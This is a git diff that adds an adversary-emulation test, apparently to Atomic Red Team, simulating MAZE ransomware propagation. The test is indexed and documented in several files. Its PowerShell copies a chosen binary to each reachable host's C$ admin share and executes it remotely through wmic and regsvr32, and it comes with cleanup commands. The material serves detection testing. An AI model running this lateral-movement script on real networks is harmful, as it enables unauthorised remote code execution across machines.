diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4f108daf..c1fd469b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1151,6 +1151,7 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b6835f4f..9f7f8308 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -731,6 +731,7 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3485d3ad..2827095e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1866,6 +1866,7 @@
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+ - Atomic Test #21: MAZE Propagation Script [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 32a24f94..09db92b6 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1175,6 +1175,7 @@
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+ - Atomic Test #21: MAZE Propagation Script [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2a827447..08f01d22 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -75907,6 +75907,69 @@ command-and-control:
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
name: command_prompt
+ - name: MAZE Propagation Script
+ auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+ description: "This test simulates MAZE ransomware's propogation script that
+ searches through a list of computers, tests connectivity to them, and copies
+ a binary file to the Windows\\Temp directory of each one. \nUpon successful
+ execution, a specified binary file will attempt to be copied to each online
+ machine, a list of the online machines, as well as a list of offline machines
+ will be output to a specified location.\nReference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+ \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ binary_file:
+ description: Binary file to copy to remote machines
+ type: string
+ default: "$env:comspec"
+ exe_remote_folder:
+ description: Path to store executable on remote machine (no drive letter)
+ type: String
+ default: "\\Windows\\Temp\\T1105.exe"
+ remote_drive_letter:
+ description: Remote drive letter
+ type: String
+ default: C
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Binary file must exist at specified location (#{binary_file})
+
+ '
+ prereq_command: 'if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'write-host "The binary_file input parameter must be set
+ to a binary that exists on this computer."
+
+ '
+ - description: 'Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+
+ '
+ prereq_command: 'if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0}
+ else {exit 1}
+
+ '
+ get_prereq_command: |
+ new-item -path "$env:temp\T1105MachineList.txt"
+ echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+ executor:
+ command: "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list
+ = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach
+ ($machine in get-content -path \"$machine_list\")\n{if (test-connection
+ -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\"
+ \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine
+ >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe
+ /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine
+ >> \"$offline_list\"}}\n"
+ cleanup_command: "if (test-path \"$env:temp\\T1105CompletedHosts.txt\") \n{foreach
+ ($machine in get-content -path \"$env:temp\\T1105CompletedHosts.txt\")\n{wmic
+ /node: \"$machine\" process where name='\"regsvr32.exe\"' call terminate
+ | out-null\nRemove-Item -path \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"
+ -force -erroraction silentlycontinue}}\nRemove-Item -path \"$env:temp\\T1105OfflineHosts.txt\"
+ -erroraction silentlycontinue\nRemove-item -path \"$env:temp\\T1105CompletedHosts.txt\"
+ -erroraction silentlycontinue\n"
+ name: powershell
T1090.001:
technique:
type: attack-pattern
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 33f2525d..71a24b35 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -44,6 +44,8 @@
- [Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download](#atomic-test-20---download-a-file-with-microsoft-connection-manager-auto-download)
+- [Atomic Test #21 - MAZE Propagation Script](#atomic-test-21---maze-propagation-script)
+
@@ -884,4 +886,81 @@ rmdir /s/q %temp%\T1105 >nul 2>&1
+
+
+
+## Atomic Test #21 - MAZE Propagation Script
+This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one.
+Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
+Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_file | Binary file to copy to remote machines | string | $env:comspec|
+| exe_remote_folder | Path to store executable on remote machine (no drive letter) | String | \Windows\Temp\T1105.exe|
+| remote_drive_letter | Remote drive letter | String | C|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$machine_list = "$env:temp\T1105MachineList.txt"
+$offline_list = "$env:temp\T1105OfflineHosts.txt"
+$completed_list = "$env:temp\T1105CompletedHosts.txt"
+foreach ($machine in get-content -path "$machine_list")
+{if (test-connection -Count 1 -computername $machine -quiet)
+{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
+echo $machine >> "$completed_list"
+wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
+else
+{echo $machine >> "$offline_list"}}
+```
+
+#### Cleanup Commands:
+```powershell
+if (test-path "$env:temp\T1105CompletedHosts.txt")
+{foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt")
+{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
+Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
+Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue
+Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Binary file must exist at specified location (#{binary_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "The binary_file input parameter must be set to a binary that exists on this computer."
+```
+##### Description: Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item -path "$env:temp\T1105MachineList.txt"
+echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+```
+
+
+
+